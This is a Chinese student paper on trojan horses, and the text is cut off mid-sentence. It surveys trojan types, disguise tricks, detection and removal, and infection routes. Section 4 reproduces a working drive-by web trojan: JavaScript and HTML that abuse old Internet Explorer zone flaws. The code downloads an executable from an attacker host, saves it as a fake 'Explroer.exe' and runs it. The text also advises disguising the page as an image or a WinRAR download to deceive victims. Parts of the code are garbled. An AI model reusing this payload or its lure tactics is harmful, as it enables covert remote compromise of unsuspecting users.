信息安全论文.doc

题目：木马作者：芦存博 20075401178 宋婷 20075401166 徐丽亚20075401186 王笑瑜20075401045摘要：木马是特洛伊木马的简称，是一种在远程计算机之间建立起连接，使远程计算机能通过网络控制本地计算机上的程序。它冒名顶替，以人们所知晓的合法而正常的程序（如计算机游戏，压缩工具乃至防治计算机病毒软件等）面目出现，来达到欺骗欲获得该合法程序的用户将之在计算机上运行，产生用户所料不及的破坏后果之目的。通俗地讲，木马就是一种“挂羊头，卖狗肉”的实施破坏作用的计算机程序。关键词：类型；伪装方式；查杀方法；源代码；工作原理；反查杀技术0 引言 从本质上讲，木马程序属于远程管理工具的范畴，如PCAnyWhere等，其目的在于通过网络进行远程管理控制。木马和远程控制软件的区别在于木马具有隐蔽性，远程控制软件的服务器端在目标计算机上运行时，目标计算机会出现很醒目的标志，而木马类软件的服务器端在运行时则使用多种手段来隐藏自己。1,木马的类型(1) 破坏型 这种木马是很令人讨厌的，这个病毒可以自动的删除电脑上的重要文件，例如dLL、INI、EXE文件。(2) 密码发送型 主要是用来盗窃用户隐私信息的，他可以把隐藏的密码找出来发送到指定的信箱。也可以用来盗窃用户的敏感口令等。同时，此类病毒最重要的是会记录操作者的键盘，找到相关的有用的信息。(3) 远程访问型 使用最多既木马。入侵者运行了客户端，使用木马者就可以通过远程连接到对方电脑，访问对方电脑资源。(4) 键盘记录木马 这种键盘木马一般都制作的很短小精悍，主要用来记录中木马者的键盘敲击记录，并且根据网络访问情况，给木马使用者发送到指定的信箱等。(5) DOS攻击型 DOS的全称是洪水式服务攻击。是用来请求服务器请求，让服务器忙与处理应答，而占用了大量的资源，最后服务器资源耗尽而死机。使用多台电脑DOS攻击取得的效果更好，可以用他来慢慢攻击更多的电脑。(6) 代理木马 可以把自己的电脑从其他地方代理，然后重新访问网络服务器，起一个中转的作用。(7) FTP木马 FTP木马容量也很小，一般情况下是用来打开21端口来等待用户连接。(8) 程序杀手木马 主要是用来关闭一些监控软件等，这样就可以让木马更安全的保留在系统中，防止被监控软件发现，从而对用户造成数据丢失，敏感信息泄露等故障。(9) 反弹端口型木马反弹端口是为了躲避防火墙的过滤而制作的。因为防火墙会对连入的链接做一个很严格的过滤，对于连出的链接可能就不是那么严格了，所以利用这一点，把端口反弹，就可以更安全的使用了。2,木马的伪装方式（1）修改图标对木马程序的图标进行修改，从而伪装成其他类型文件，以达到欺骗用户的目的。现在有的木马已经可以将木马服务器端程序的图标改成HTML,TXT,ZIP等各种文件的图标，具有相当大的迷惑性。（2）出错显示如果打开一个文件后没有任何反应，这很可能就是个木马程序，木马的设计者也意识到了这个缺陷，所以已经有木马提供了一个叫做出错显示的功能。当服务器端用户打开木马程序时，会弹出一个错误提示框（当然是假的），错误内容可自由定义，大多会定制成一些诸如“文件已破坏，无法打开！”之类的信息，当服务器端用户信以为真时，木马却悄悄侵入了系统。( 3)定制端口很多老式的木马端口都是固定的，这给判断是否感染了木马带来了方便，只要查一下特定的端口就知道感染了什麽木马，所以现在很多新式的木马都加入了定制端口的功能，控制端用户可以102465535之间任选一个端口作为木马端口，这样就给判断所感染的木马类型带来了麻烦(4)自我销毁当服务器端用户打开含有木马的文件后，木马会将自己复制到windows的系统文件夹中。一般来说源木马文件和系统文件夹中的木马文件的大小是一样的（捆绑文件的木马除外），那么中了木马的系统只要在近来收到的心间和下载的软件中找到源木马文件，然后根据源木马的大小去系统文件夹中找到相同大小的文件，判断一个哪个是木马就行了。木马的自我销毁功能弥补了木马的这一缺陷。当安装完木马后，源木马文件将自动销毁，这样服务器端用户就很难找到木马的来源，在没有查杀木马的工具帮助下，就很难删除木马了。（5）木马更名安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章，在系统文件夹中查找特定的文件，就可以断定中了什么木马。所以现在有很多木马都允许控制端用户自由定制安装后的木马文件名，这样就很难判断所感染的木马类型了。(6)捆绑文件将木马捆绑到一个安装程序上，当安装程序运行时，木马在用户毫无察觉的情况下，偷偷地进入系统。也可以将木马和一张图片捆绑，当用户打开“图片”时，木马就在后台不知不觉地运行了。3,木马的查杀方法木马的清除方法，可以总结为监视端口，监视文件，监视进程，监视进程模块和监视注册表，一旦发现木马，然后采取相应的清除措施。木马的本质是程序，必须运行起来后才能工作，所以必定会在系统中留下一些蛛丝马迹。下面针对一些常用木马所惯用的伎俩来找出躲在系统中的木马。检查是否存在陌生进程，检查注册表，检查开放的端口，使用冰刃进行检查，监控注册表的变化。通过以上方法，基本能确定系统中是否存在木马。 手工清除木马的步骤是：找到木马文件，结束木马进程，删除木马文件进行善后处理 当然，木马查找和清除的最好办法还是借助于专门的软件实现。专业的木马清除工具有Trojan Hunter和AVG Anti-Spyware(Ewido)等4,木马的源代码及工作原理function icyfoxlovelace /得到系统目录和系统盘url=document.location.href;xtmu=url.substring6,url.indexOf,9+1;xtp=url.substr6,3;var shell=new ActiveXObject"shell.application"var runbz=1;/此处设置木马程序的大小，以字节为单位/请把198201改为你的木马程序的实际大小var exeSize=198201;/设置木马程序名及扩展名exe,com,bat,pif,scr，用于判断是否是所下载的木马程序/请把下面两行中的icyfox改为你的木马程序名，bat改为你的木马程序的扩展名var a=/icyfoxd*.bat/gi;pile"icyfoxd*.bat","gi"var b=/A-Za-z/gi;pile"A-Za-z","gi"/正则表达式,用于判断是否是盘的根目录/下面的代码查找并运行木马程序wjjxtmu+"Temporary Internet Files"/Content.IE5ifrunbzwjjxtp+"Documents and Settings"ifrunbzyp;/在所有硬盘分区下查找并运行木马程序function yp try var c=new Espace"c".ParentFolder.Items;for ;!c.atEnd;c.moveNext ifrunbz ifb.testc.item.pathwjjc.item.path; else break;catche /利用递归在指定目录包括子目录下查找并运行木马程序function wjjb try var c=new Espaceb.Items;for ;!c.atEnd;c.moveNext ifrunbz&&c.item.Size=exeSize&&a.testc.item.path var f=c.item.path;var v=f.lastIndexOf+1;try spacef.substring0,v.items.itemf.substrv.invokeverb;/运行木马程序runbz=0;break; catche if!c.item.Sizewjjc.item.path+""/如果是子目录则递归调用catche icyfoxlovelace;请把以上代码保存为icyfox.js。 接下来我们就要利用一个小小跨域执行漏洞，来获得"我的电脑"域的网页权限，大家以前是不是和我一样觉得这种漏洞仅仅只能用来进行跨站脚本攻击，得到COOKIE之类的东东呢？这次它终于可以露脸啦！代码如下：<HTML><HEAD><META http-equiv=Content-Type content="text/html; charset=gb2312"><TITLE>冰狐浪子网络技术实验室的完美网页木马</TITLE></HEAD><BODY oncontextmenu="return false" onselectstart="return false" scroll="no" topmargin="0" leftmargin="0"><SCRIPT LANGUAGE="icyfoxlovelace" src="http//wodemuma/icyfox.bat"></SCRIPT><SCRIPT LANGUAGE="JavaScript">/此处设置上面icyfox.js文件的网络地址/请把http//wodemuma/icyfox.js改为你的icyfox.js文件实际上传地址jsurl="http//wodemuma/icyfox.js".replace/g,/;WIE=navigator.appVersion;ifWIE.indexOf"MSIE 5.0">-1 /*IE 5.0利用iframe标签,src属性设为icyfox/则会使此标签具备"我的电脑"域的权限,原因是因为icyfox/是不存在的协议，所以会会利用res/协议打开SHDOCLC.DLL中的语法错误页syntax.htm，而且SHDOCLC.DLL又位于系统目录中，为在icyfox.js中得到系统目录和系统盘提供数据；*/document.write"<iframe style=displaynone; name=icyfoxlovelace src=icyfox/></iframe>"setTimeout"muma0",1000;else /*IE5.5、IE6.0则利用_search漏洞，把打开的地址设为icyfox/，从而使_search搜索框具备"我的电脑"域的权限，因为在IE6.0中无法用上面的iframe漏洞，IE5.5应该可以用，我没有测试。这样做的结果会打开搜索栏,有点遗憾！*/window.open"icyfox/","_search"setTimeout"muma1",1000;/下面利用filejavascript协议漏洞在已是我的电脑"域的权限的"icyfox/"中插入icyfox.js脚本并运行function muma0 window.open"filejavascriptdocument.all.tagsSCRIPT0.src="+jsurl+"eval;","icyfoxlovelace"function muma1 window.open"filejavascriptdocument.all.tagsSCRIPT0.src="+jsurl+"eval;","_search" </SCRIPT></BODY><NOSCRIPT><iframe style="displaynone;" src=*.*></iframe></NOSCRIPT></HTML>把上面的代码保存为icyfox.htm,如果你愿意可以把扩展名改为jpg并在网页中加入一个精美的图片背景，来做一个图片木马，甚至你可以改为exe，来冒充一个好的程序的下载地址，并在网页的<HEAD></HEAD>中加入标签<metahttp-equiv="refresh" content="5;url=http//winrar.exe">来定时转到另一个真正的程序下载地址，从而更好的欺骗别人。 如果你觉得win98没必要控制的话，还有更好的木马等着你，不知大家是否用过win2000、winxp等系统中默认安装的ADODB.Stream及Microsoft.XMLHTTP控件？它们可是和shell.application控件一样是经过了安全认证的，可以在"我的电脑"域中的网页中畅通无阻执行的好东西呀！请看下面的代码：function icyfox /设置下载后保存在系统目录下的木马程序名，我设的是不是很象Explorer.exe呀？呵呵var name="Explroer.exe"/设置你要下载的木马程序的地址（此处你可以把扩展名任意改，甚至没有扩展名也可以的/可以更好的躲过免费主页空间的上传限制var url="http//wodemuma/icyfox.bat"try var folder=document.location.href;folder=folder.substring6,folder.indexOf,9+1+name;var xml=new ActiveXObject"Microsoft.XMLHTTP"xml.open"GET",url,false;xml.send;ifxml.status=200 var ado=new ActiveXObject"ADODB.Stream"ado.Type=1;ado.Open;ado.writexml.responseBody;ado.SaveToFilefolder,2;ado.Close;ado=null;xml=null;document.body.insertAdjacentHTMLAfterBegin,<OBJECT style="displaynone;" TYPE="application/x-oleobject" CODEBASE="+folder+"></OBJECT>catche icyfox;把上面的的代码保存为icyfox.js替换上面保存的icyfox.js文件，同样利用上面的icyfox.htm来注入到"我的电脑"域中，呵呵你就偷这乐吧！最后还请大家发挥以下DIY的能力把上面两种代码合二为一，我相信一个现阶段最最完美的网页木马就会在你手中诞生啦！是不是神不知鬼不觉？提示代码如下：try new ActiveXObject"ADODB.Stream"icyfox; catche icyfoxlovelace; 一般的木马程序都包括客户端和服务端两个程序，其申客户端是用于攻击者远程控制植入木马的机器，服务器端程序即是木马程序。攻击者要通过木马攻击你的系统，他所做的第一步是要把木马的服务器端程序植人到你的电脑里面。目前木马入侵的主要途径还是先通过一定的方法把木马执行文件弄到被攻击者的电脑系统里，利用的途径有邮件附件、下载软件中等，然后通过一定的提示故意误导被攻击者打开执行文件，比如故意谎称这个木马执行文件，是你朋友送给你贺卡，可能你打开这个文件后，确实有贺卡的画面出现，但这时可能木马已经悄悄在你的后台运行了。一般的木马执行文件非常小，大部分都是几K到几十K，如果把木马捆绑到其他正常文件上，你很难发现，所以，有一些网站提供的软件下载往往是捆绑了木马文件的，你执行这些下载的文件，也同时运行了木马。木马也可以通过Script、ActiveX及Asp.CGI交互脚本的方式植入，由于微软的浏览器在执行Senipt脚本存在一些漏洞。攻击者可以利用这些漏洞传播病毒和木马，甚至直接对浏览者电脑进行文件操作等控制。前不久献出现一个利用微软Scripts脚本漏洞对浏览者硬盘进行格式化的HTML页面。如果攻击者有办法把木马执行文件下载到攻击主机的一个可执行WWW目录夹里面，他可以通过编制CGI程序在攻击主机上执行木马目录。此外，木马还可以利用系统的一些漏洞进行植人，如微软著名的US服务器溢出漏洞，通过一个IISHACK攻击程序即可使IIS服务器崩溃，并且同时攻击服务器，执行远程木马执行文件。当服务端程序在被感染的机器上成功运行以后，攻击者就可以使用客户端与服务端建立连接，并进一步控制被感染的机器。在客户端和服务端通信协议的选择上，绝大多数木马使用的是TCP/IP协议，但是也有一些木马由于特殊的原因，使用UDP协议进行通讯。当服务端在被感染机器上运行以后，它一方面尽量把自己隐藏在计算机的某个角落里面，以防被用户发现;同时监听某个特定的端口，等待客户端与其取得连接;另外为了下次重启计算机时仍然能正常工作。木马程序一般会通过修改注册表或者其他的方法让自己成为自启动程序。5,木马的反查杀技术木马是如何启动的作为一个优秀的木马，自启动功能是必不可少的，这样可以保证木马不会因为你的一次关机操作而彻底失去作用。正因为该项技术如此重要，所以，很多编程人员都在不停地研究和探索新的自启动技术，并且时常有新的发现。一个典型的例子就是把木马加入到用户经常执行的程序 (例如ex